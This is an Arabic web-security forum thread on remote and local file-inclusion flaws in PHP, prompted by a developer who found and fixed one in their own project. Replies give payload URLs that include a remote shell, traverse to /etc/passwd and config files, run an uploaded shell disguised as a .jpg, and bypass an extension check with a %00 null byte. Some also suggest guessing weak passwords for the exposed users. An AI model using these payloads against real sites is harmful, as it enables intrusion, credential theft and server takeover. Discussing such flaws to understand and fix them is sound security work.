للمُهتمّين بإختبارات إختراق تطبيقات الويب .. RFL

[ميسي الروقي]

السلام عليكُم ..
رمضان كريم عليكم جميعاً ..

أمآآ بعد ..

بينما أقوم بإختبار إختراق أحد مشاريعي البرمجية على الويب والتي من المُفترض تسليمها الاسبوع القادم, وجَدت ثغرة RemoteFileInclude خطيرة بموقعي, قُمت بإغلاقِها وسأسلّم المشروع قريباً ان شاء الله .

لكن الذي جَعلني أقم بكتابة الموضوع هو النقاش على كيفية استغلالها و قُدرة الهاكر المحُترف على إستغلال الثغرة, والذي كان تَعقيداً لي أن أرفَع الـShell عبرها .

الآن أنا أعتبر ذلك تحدّياً حسب خِبرتي البرمجية (الضعيفة قليلاً :court: ) و أفتتح النقاش حَول الإستغلال الأمثل لتلك الثغرة (والذي سيكون للمعرفة لا للتخريب, ولمصلحة المبرمجين و الهاكرز الأخلاقيين) .

الثغرَة يَ قمآآآآعه :

في إحدى مجلدات جَلب الصور كان إستغلالُها كالتالي :

كود:

site.com/admin/show.php?file=(RFL) !

سيعرض الملف الذي موجود في some_folder/pics/(file)

الآن المطلوب رفع Shell مثلاً أو إستغلالها بطلب ملفات معينة أو الإستفادة منها للمُخترق .
آتتحفووني بقدرآتكم ..

[ميسي الروقي]

المعذرة ..
الإختصار يجب أن يَكون RFI ..
آخطأت بين كابيتال الـI وكابيتآل الـL .

[doctor9]

يفضل رؤية الكود للحكم اكثر هل هي ريموت فايل انكلود ام لوكل فايل انكلود ام محميه

اذا كانت ريموت فاستغلالها برفع شل على صيغة txt ووضع الرابط ليصبح

site.com/admin/show.php?file=http://www.example.com/upload/shell.txt

اما لوكل فيكون الاستغلال هكذا

site.com/admin/show.php?file=../include/config.php
على افتراض وجود مجلد include بداخله الكونفق




هذا مالدي من خبرتي المتواضعه

[alotaiby]

مثلا في حال أن لدينا ملف هو index.php محتواه

كود PHP:

<?php
include($_GET['page']);
?>

واستخدام الملف على النحو الطبيعي الذي يريده المبرمج لعرض صفحة أتصل بنا مثلا هكذا
index.php?page=contact.php
يعني يجلب ملف داخلي

والإستغلال الضار لهذه الثغرة بطريقتين

LFI
index.php?page=../../../../../etc/passwd
ستخرج جميع اليوزرات على السيرفر وبإمكان المخترق من خلال برنامج معين تخمين
كلمة 123456 أو 123456789 ونحوها على جميع اليوزرات التي ظهرت له
وقد يتمكن من الحصول في الأخير على شوية لوحات سيبنل

يوجد استغلالات أوسع لهذه الثغرة ولكن الكلام حولها يطووول !


RFI
index.php?page=http://www.example.com/upload/shell.txt

نعم في الماضي كان ممكن أن الدالة include تجلب ملف بعيد وتشغله
أما الآن تم تعطيل جلب الملفات البعيده بشكل افتراضي في إعدادات php.ini وذلك منذ الإصدار 4.3.0 والدليل

ملاحظة ( دالة include هي دالة سحب وتنفيذ وليست سحب وقرائه ) يعني لن تستفيد لو سحبت config.php ستخرج صفحة بيضاء

[alotaiby]

إضافة أخرى لطريقة استغلال اللوكال فايل سأذكرها بتأنيب ضمير !
لو كان في الموقع المصاب بهذه الثغرة مركز رفع أرفع شل بإمتداد .jpg وأستعرضه هكذا
index.php?page=uploads/shell.jpg
النتيجة سيعمل الشل وهذه إجابة على التساؤل في موضوعك

إذا كنت هاوي اختراق نصيحتي أن تعتزل أنا أحد من خاض في هذا المجال
ولي صولات وجولات فيه وما أحلى الإنترنت بعد اعتزال الإختراق

[ميسي الروقي]

أفكار جيّدة ,,
أخي العتيبي مايحدث بالموضوع مجرد تجارب فَقط, لكن السؤال الآن يا أصدقاء:
index.php?page=../../../../../etc/passwd

هل يؤثر هذا الاستغلال إذا كان السكربت يُضيف إفتراضياً اللاحقة .html أو .jpg عند الاستدعاء ؟
يعني يُصبح الرابط :
index.php?page=../../../../../etc/passwd.jpg
وهل هناك طُرق يستطيع بها المخترق حذف اللاحقة .jpg ؟ فهنا مَربط الفرس (:

[alotaiby]

وهل هناك طُرق يستطيع بها المخترق حذف اللاحقة .jpg ؟ فهنا مَربط الفرس (:

بعض السكربتات تظيف تلقائيا اللاحقة .php كإجراء أمني
حتى ماتقدر تقرأ passwd

مثال

كود PHP:

<?php
include($_GET['page'].'.php');
?>

استخدامه على النحو الذي يريده المبرمج لعرض صفحة اتصل بنا مثلا
index.php?page=contact

طبعا لو جلبت etc/passwd سيقرأها الملف كأنها etc/passwd.php
ولا يوجد ملف بعذا الإسم وبالتالي لاتستطيع قراءته

ظهرت طريقة تخطي بإضافة %00 نهاية الرابط

index.php?page=../../../../../etc/passwd%00

الرمز هذا كان يسبب لخبطه للداله ويسحب الملف زي ماهو وهذه طريقة التخطي لإجراء الحمايه هذا
وأظن تم ترقيعها في اصدارات php الحديثه